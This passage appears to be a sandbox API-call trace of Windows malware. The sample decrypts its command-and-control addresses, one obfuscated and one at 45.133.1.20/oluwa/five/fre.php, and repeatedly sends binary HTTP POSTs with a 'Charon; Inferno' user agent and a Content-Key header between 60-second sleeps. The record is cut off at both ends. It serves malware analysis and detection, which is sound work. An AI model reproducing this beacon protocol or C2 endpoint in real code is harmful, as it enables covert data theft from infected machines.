param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0189.061] GetProcessHeap () returned 0x6a0000 [0189.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0189.061] GetProcessHeap () returned 0x6a0000 [0189.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0189.062] send (s=0x470, buf=0x6b5c98*, len=242, flags=0) returned 242 [0189.063] send (s=0x470, buf=0x6bb998*, len=159, flags=0) returned 159 [0189.063] GetProcessHeap () returned 0x6a0000 [0189.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0189.063] recv (in: s=0x470, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0189.139] GetProcessHeap () returned 0x6a0000 [0189.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0189.139] GetProcessHeap () returned 0x6a0000 [0189.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0189.140] GetProcessHeap () returned 0x6a0000 [0189.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0189.141] GetProcessHeap () returned 0x6a0000 [0189.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0189.141] closesocket (s=0x470) returned 0 [0189.142] GetProcessHeap () returned 0x6a0000 [0189.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0189.142] GetProcessHeap () returned 0x6a0000 [0189.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0189.142] GetProcessHeap () returned 0x6a0000 [0189.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0189.143] GetProcessHeap () returned 0x6a0000 [0189.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0189.143] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11dc) returned 0x470 [0189.145] Sleep (dwMilliseconds=0xea60) [0189.146] GetProcessHeap () returned 0x6a0000 [0189.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0189.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.148] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0189.169] GetProcessHeap () returned 0x6a0000 [0189.169] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6bfd58 [0189.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.172] CryptImportKey (in: hProv=0x6befd0, pbData=0x6bfd58, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0189.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.173] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.174] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.174] GetProcessHeap () returned 0x6a0000 [0189.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bfd58 | out: hHeap=0x6a0000) returned 1 [0189.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.176] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0189.177] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.178] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0189.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.179] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0189.179] GetProcessHeap () returned 0x6a0000 [0189.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0189.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.188] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0189.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.189] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0189.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.191] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0189.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.192] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0189.192] GetProcessHeap () returned 0x6a0000 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0189.192] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0189.193] GetProcessHeap () returned 0x6a0000 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0189.193] GetProcessHeap () returned 0x6a0000 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0189.194] GetProcessHeap () returned 0x6a0000 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0189.194] GetProcessHeap () returned 0x6a0000 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0189.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.198] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.211] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0189.221] GetProcessHeap () returned 0x6a0000 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0189.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.222] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0189.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.224] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.225] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.225] GetProcessHeap () returned 0x6a0000 [0189.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0189.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.230] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0189.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.231] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0189.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.233] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0189.233] GetProcessHeap () returned 0x6a0000 [0189.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0189.234] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.234] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0189.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.235] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0189.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.237] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0189.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.241] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0189.241] GetProcessHeap () returned 0x6a0000 [0189.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0189.241] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0189.241] GetProcessHeap () returned 0x6a0000 [0189.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0189.241] socket (af=2, type=1, protocol=6) returned 0x474 [0189.242] connect (s=0x474, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0189.277] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0189.277] GetProcessHeap () returned 0x6a0000 [0189.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0189.277] GetProcessHeap () returned 0x6a0000 [0189.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0189.278] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0189.279] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0189.279] GetProcessHeap () returned 0x6a0000 [0189.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0189.279] GetProcessHeap () returned 0x6a0000 [0189.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0189.280] GetProcessHeap () returned 0x6a0000 [0189.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0189.280] GetProcessHeap () returned 0x6a0000 [0189.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0189.281] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0189.282] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0189.282] GetProcessHeap () returned 0x6a0000 [0189.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0189.282] GetProcessHeap () returned 0x6a0000 [0189.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0189.282] send (s=0x474, buf=0x6b5c98*, len=242, flags=0) returned 242 [0189.284] send (s=0x474, buf=0x6bb998*, len=159, flags=0) returned 159 [0189.284] GetProcessHeap () returned 0x6a0000 [0189.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0189.284] recv (in: s=0x474, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0189.381] GetProcessHeap () returned 0x6a0000 [0189.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0189.381] GetProcessHeap () returned 0x6a0000 [0189.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0189.382] GetProcessHeap () returned 0x6a0000 [0189.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0189.382] GetProcessHeap () returned 0x6a0000 [0189.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0189.383] closesocket (s=0x474) returned 0 [0189.466] GetProcessHeap () returned 0x6a0000 [0189.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0189.466] GetProcessHeap () returned 0x6a0000 [0189.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0189.488] GetProcessHeap () returned 0x6a0000 [0189.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0189.488] GetProcessHeap () returned 0x6a0000 [0189.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0189.510] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11e0) returned 0x474 [0189.512] Sleep (dwMilliseconds=0xea60) [0189.515] GetProcessHeap () returned 0x6a0000 [0189.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0189.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.517] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.537] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0189.548] GetProcessHeap () returned 0x6a0000 [0189.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0189.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.549] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0189.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.550] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.552] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.552] GetProcessHeap () returned 0x6a0000 [0189.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0189.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.553] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0189.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.554] CryptDestroyKey (hKey=0x6ad020) returned 1 [0189.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.555] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0189.555] GetProcessHeap () returned 0x6a0000 [0189.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0189.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.558] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0189.559] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.560] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0189.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.561] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0189.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.562] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0189.562] GetProcessHeap () returned 0x6a0000 [0189.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0189.562] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0189.562] GetProcessHeap () returned 0x6a0000 [0189.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0189.563] GetProcessHeap () returned 0x6a0000 [0189.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0189.563] GetProcessHeap () returned 0x6a0000 [0189.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0189.564] GetProcessHeap () returned 0x6a0000 [0189.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0189.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.565] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.575] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0189.588] GetProcessHeap () returned 0x6a0000 [0189.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0189.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.592] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0189.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.593] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.594] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.594] GetProcessHeap () returned 0x6a0000 [0189.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0189.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.595] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0189.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.598] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0189.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0189.599] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0189.599] GetProcessHeap () returned 0x6a0000 [0189.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0189.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.600] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0189.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.603] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0189.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.604] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0189.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0189.605] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0189.605] GetProcessHeap () returned 0x6a0000 [0189.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0189.605] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0189.605] GetProcessHeap () returned 0x6a0000 [0189.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0189.606] socket (af=2, type=1, protocol=6) returned 0x478 [0189.606] connect (s=0x478, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0189.627] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0189.627] GetProcessHeap () returned 0x6a0000 [0189.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0189.627] GetProcessHeap () returned 0x6a0000 [0189.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0189.628] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0189.629] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0189.629] GetProcessHeap () returned 0x6a0000 [0189.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0189.629] GetProcessHeap () returned 0x6a0000 [0189.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0189.630] GetProcessHeap () returned 0x6a0000 [0189.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0189.630] GetProcessHeap () returned 0x6a0000 [0189.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0189.631] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0189.632] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0189.632] GetProcessHeap () returned 0x6a0000 [0189.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0189.632] GetProcessHeap () returned 0x6a0000 [0189.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0189.633] send (s=0x478, buf=0x6b5c98*, len=242, flags=0) returned 242 [0189.634] send (s=0x478, buf=0x6bb998*, len=159, flags=0) returned 159 [0189.635] GetProcessHeap () returned 0x6a0000 [0189.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0189.635] recv (in: s=0x478, 